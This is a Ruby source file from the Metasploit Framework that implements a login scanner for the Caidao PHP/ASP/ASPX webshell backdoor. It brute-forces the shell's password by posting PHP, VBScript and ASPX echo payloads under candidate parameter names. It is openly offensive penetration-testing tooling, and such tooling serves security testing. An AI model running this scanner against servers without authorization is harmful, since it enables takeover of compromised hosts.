GitHub Repository: rapid7/metasploit-framework
Path: blob/master/lib/metasploit/framework/login_scanner/caidao.rb
require 'metasploit/framework/login_scanner/http'
module Metasploit
module Framework
module LoginScanner
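# Login scanner for the "Chinese Caidao" PHP/ASP/ASPX webshell backdoor.
#
# A Caidao-style shell reads its command from a single POST parameter whose
# name is the shell's password. The scanner therefore posts an echo payload
# under the candidate password and reports the credential as valid only when
# the response body contains the random marker that payload was built to print.
class Caidao < HTTP
  # Inherit LIKELY_PORTS, LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
  DEFAULT_PORT = 80
  PRIVATE_TYPES = [ :password ].freeze
  LOGIN_STATUS = Metasploit::Model::Login::Status # Shorter name

  # Length of each random token used for the echo payload. Three tokens are
  # concatenated into the success marker, so the marker is 12 characters.
  TOKEN_LENGTH = 4

  # Checks if the target is Caidao Backdoor. The login module should call this.
  #
  # Generates the random tokens once per instance and builds the echo payload
  # matching the script type named by the request URI. Only `.php`, `.asp`
  # and `.aspx` URIs are supported; for anything else `@payload` is reset to
  # nil (so a stale payload from an earlier URI is never reused) and false is
  # returned.
  #
  # @return [Boolean] TrueClass if target is Caidao, otherwise FalseClass
  def check_setup
    @flag  ||= Rex::Text.rand_text_alphanumeric(TOKEN_LENGTH)
    @lmark ||= Rex::Text.rand_text_alphanumeric(TOKEN_LENGTH)
    @rmark ||= Rex::Text.rand_text_alphanumeric(TOKEN_LENGTH)

    @payload =
      case uri
      when /php$/mi
        "$_=\"#{@flag}\";echo \"#{@lmark}\".$_.\"#{@rmark}\";"
      when /asp$/mi
        # Kept as separate literals so the doubled quotes (VBScript string
        # escaping) stay readable.
        [
          'execute("response.write(""', @lmark,
          '""):response.write(""', @flag,
          '""):response.write(""', @rmark,
          '""):response.end")'
        ].join
      when /aspx$/mi
        "Response.Write(\"#{@lmark}\");Response.Write(\"#{@flag}\");Response.Write(\"#{@rmark}\")"
      end

    !@payload.nil?
  end

  # Default to POST unless the caller already chose a method, then let HTTP
  # fill in its own defaults.
  def set_sane_defaults
    self.method = "POST" if self.method.nil?
    super
  end

  # Actually doing the login. Called by #attempt_login
  #
  # The candidate password is used as the POST parameter name and the echo
  # payload built by #check_setup as its value. A 200 response whose body
  # contains "<lmark><flag><rmark>" means the payload was executed, i.e. the
  # password is correct.
  #
  # @param username [String] The username to try (not used by this scanner)
  # @param password [String] The password to try
  # @return [Hash]
  #   * :status [Metasploit::Model::Login::Status]
  #   * :proof [String] the HTTP response (res.to_s)
  def try_login(username, password)
    # Build the payload lazily if the module skipped #check_setup; otherwise
    # the request would carry an empty command.
    check_setup if @payload.nil?

    res = send_request(
      'method' => method,
      'uri' => uri,
      'data' => "#{password}=#{@payload}"
    )

    return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: res.to_s } unless res

    # Never match on an empty marker: String#include?("") is always true, which
    # would turn every 200 response into a false SUCCESSFUL when the tokens
    # were never generated.
    marker = "#{@lmark}#{@flag}#{@rmark}"
    if res.code == 200 && !marker.empty? && res.body.to_s.include?(marker)
      return { status: LOGIN_STATUS::SUCCESSFUL, proof: res.to_s }
    end

    { status: LOGIN_STATUS::INCORRECT, proof: res.to_s }
  end

  # Attempts to login to Caidao Backdoor. This is called first.
  #
  # Connection-level failures (Rex::ConnectionError) are reported as
  # UNABLE_TO_CONNECT with the exception message as proof instead of raised.
  #
  # @param credential [Metasploit::Framework::Credential] The credential object
  # @return [Result] A Result object indicating success or failure
  def attempt_login(credential)
    result_opts = {
      credential: credential,
      status: LOGIN_STATUS::INCORRECT,
      proof: nil,
      host: host,
      port: port,
      protocol: 'tcp',
      service_name: ssl ? 'https' : 'http'
    }

    begin
      result_opts.merge!(try_login(credential.public, credential.private))
    rescue ::Rex::ConnectionError => e
      result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message)
    end

    Result.new(result_opts)
  end
end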
end
end
end